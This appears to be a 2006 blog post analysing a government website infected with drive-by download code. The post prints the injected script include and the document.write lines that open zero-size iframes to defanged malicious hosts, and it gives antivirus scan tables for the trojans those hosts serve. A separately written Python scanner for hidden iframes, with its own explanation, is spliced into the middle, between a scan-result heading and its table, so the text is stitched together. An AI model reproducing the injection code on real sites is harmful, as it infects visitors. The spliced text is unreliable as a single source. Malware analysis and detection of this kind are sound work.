Original by endurer
2006.01.05, 1st edition
Today, while browsing the government website I found a few days ago that had been injected with code to automatically download virus files (see: A certain government website has been injected with code that automatically downloads virus files (2nd edition)), I noticed that the auto-download code had changed: it now takes a detour.
First it uses:
<script src=hxxp://www.****5166.com/tour/Check.js></script>
to include the file Check.js.
This Check.js actually contains HTML code:
document.write("<iframe height=0 width=0 src=hxxp://www.***csedu.gov.cn/workOA/good/index.htm></iframe>");
document.write("<iframe height=0 width=0 src=hxxp://www.***hjonline.zk.cn/muma/mm.htm></iframe>");
document.write("<iframe height=0 width=0 src=hxxp://whc330330.***go.3322.org></iframe>");
When the browser opens
hxxp://www.***csedu.gov.cn/workOA/good/index.htm
it is automatically redirected to
hxxp://www.***csedu.gov.cn/workOA/good/nt.htm
(nt.htm is reported by Kaspersky as Trojan-Downloader.JS.Agent.h).
When the browser opens nt.htm, it automatically downloads:
1. hxxp://www.***csedu.gov.cn/workOA/good/mmmmm.gif
Scan result from http://virusscan.jotti.org/:
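The chain described above (a page pulls a remote script, the script uses document.write to inject zero-size iframes, the iframes load pages that drop the payload) is what a site owner or responder needs to spot in their own page source. The following is an added example, not code from the post or from the infected site: a small scanner that extracts the HTML fragments a script hands to document.write(), then flags off-site <script src> includes and iframes that are hidden (zero height/width or CSS-hidden) or point off-site. The page and Check.js samples are constructed, the hostnames (*.invalid) are placeholders, and TRUSTED_HOSTS stands in for the site's own allowlist.

```python
import re
from urllib.parse import urlparse

# Constructed samples (not taken from the infected site): a defanged page that
# includes a third-party script, and the kind of Check.js the post describes,
# plus one ordinary visible iframe for contrast.
SAMPLE_PAGE_HTML = """
<html><body>
<script src=hxxp://third-party.invalid/tour/Check.js></script>
<script src="/js/menu.js"></script>
<p>Welcome</p>
</body></html>
"""

SAMPLE_CHECK_JS = """
document.write("<iframe height=0 width=0 src=hxxp://attacker-a.invalid/workOA/good/index.htm></iframe>");
document.write("<iframe height=0 width=0 src=hxxp://attacker-b.invalid/muma/mm.htm></iframe>");
document.write("<iframe height=0 width=0 src=hxxp://attacker-c.invalid></iframe>");
document.write('<iframe height=300 width=400 src="http://www.example-site.invalid/news.htm"></iframe>');
"""

# Hypothetical allowlist of hosts the site is expected to embed content from.
TRUSTED_HOSTS = {"www.example-site.invalid"}

_DOC_WRITE = re.compile(r"""document\.write\s*\(\s*(["'])(.*?)\1\s*\)""", re.S)
_TAG = re.compile(r"<(script|iframe)\b([^>]*)>", re.I)
_ATTR = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def refang(url):
    """Turn the defanged hxxp:// form back into a URL urlparse understands."""
    return re.sub(r"^hxxp", "http", url, flags=re.I)


def host_of(url):
    """Hostname of a (possibly defanged) URL; '' for relative paths."""
    return urlparse(refang(url)).hostname or ""


def parse_attrs(attr_text):
    """Parse tag attributes, accepting double-, single- and unquoted values."""
    attrs = {}
    for m in _ATTR.finditer(attr_text):
        attrs[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return attrs


def is_zero_size(value):
    """True for height/width values like 0 or 0px."""
    return value is not None and re.fullmatch(r"0+(px)?", value.strip()) is not None


def is_hidden_iframe(attrs):
    style = attrs.get("style", "").replace(" ", "").lower()
    return (is_zero_size(attrs.get("height")) or is_zero_size(attrs.get("width"))
            or "display:none" in style or "visibility:hidden" in style)


def extract_document_writes(js):
    """Return the string literals a script passes to document.write()."""
    return [m.group(2) for m in _DOC_WRITE.finditer(js)]


def find_suspicious_tags(html, trusted_hosts):
    """Flag off-site <script src> includes and hidden or off-site <iframe>s."""
    findings = []
    for m in _TAG.finditer(html):
        tag, attrs = m.group(1).lower(), parse_attrs(m.group(2))
        src = attrs.get("src")
        if not src:
            continue
        host = host_of(src)
        reasons = []
        if host and host not in trusted_hosts:
            reasons.append("off-site src " + host)
        if tag == "iframe" and is_hidden_iframe(attrs):
            reasons.append("hidden iframe")
        if reasons:
            findings.append({"tag": tag, "src": src, "reasons": reasons})
    return findings


def scan(page_html, remote_js, trusted_hosts):
    """Scan the page itself, then the HTML its remote script would write at runtime."""
    findings = find_suspicious_tags(page_html, trusted_hosts)
    for fragment in extract_document_writes(remote_js):
        findings.extend(find_suspicious_tags(fragment, trusted_hosts))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_PAGE_HTML, SAMPLE_CHECK_JS, TRUSTED_HOSTS):
        print(f["tag"], f["src"], "->", ", ".join(f["reasons"]))
```

Against the samples this reports the third-party script include and the three zero-size off-site iframes, and stays silent on the local menu.js and the visible, allowlisted iframe. The scanner only sees what is statically present, so the remote script has to be fetched and fed in separately, as the post did by hand; a script that builds its markup from pieces rather than one literal would need a real JS interpreter to unpack.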
| File: | mmmmm.gif |
| Status: | INFECTED/MALWARE |
| MD5 | ac49ef4f23c35cdd5830fb691890ef47 |
| Packers detected: | - |
| Scanner results | |
| AntiVir | Found nothing |
| ArcaVir | Found nothing |
| Avast | Found nothing |
| AVG Antivirus | Found nothing |
| BitDefender | Found nothing |
| ClamAV | Found nothing |
| Dr.Web | Found Trojan.DownLoader.5583 |
| F-Prot Antivirus | Found nothing |
| Fortinet | Found nothing |
| Kaspersky Anti-Virus | Found Exploit.JS.Phel.m |
| NOD32 | Found nothing |
| Norman Virus Control | Found nothing |
| UNA | Found nothing |
| VBA32 | Found nothing |
2. hxxp://www.***csedu.gov.cn/workOA/good/xxxxx.pif
Scan result from http://virusscan.jotti.org/:
| File: | xxxxx.pif |
| Status: | POSSIBLY INFECTED/MALWARE (Note: this file was only flagged as malware by heuristic detection(s). This might be a false positive. Therefore, results of this scan will not be stored in the database) |
| MD5 | 286fd19874a5558a479187c253a4909f |
| Packers detected: | - |
| Scanner results | |
| AntiVir | Found Heuristic/Trojan.PwdStealer (probable variant) |
| ArcaVir | Found nothing |
| Avast | Found nothing |
| AVG Antivirus | Found nothing |
| BitDefender | Found nothing |
| ClamAV | Found nothing |
| Dr.Web | Found nothing |
| F-Prot Antivirus | Found nothing |
| Fortinet | Found nothing |
| Kaspersky Anti-Virus | Found nothing |
| NOD32 | Found probably a variant of Win32/Hupigon (probable variant) |
| Norman Virus Control | Found nothing |
| UNA | Found nothing |
| VBA32 | Found nothing |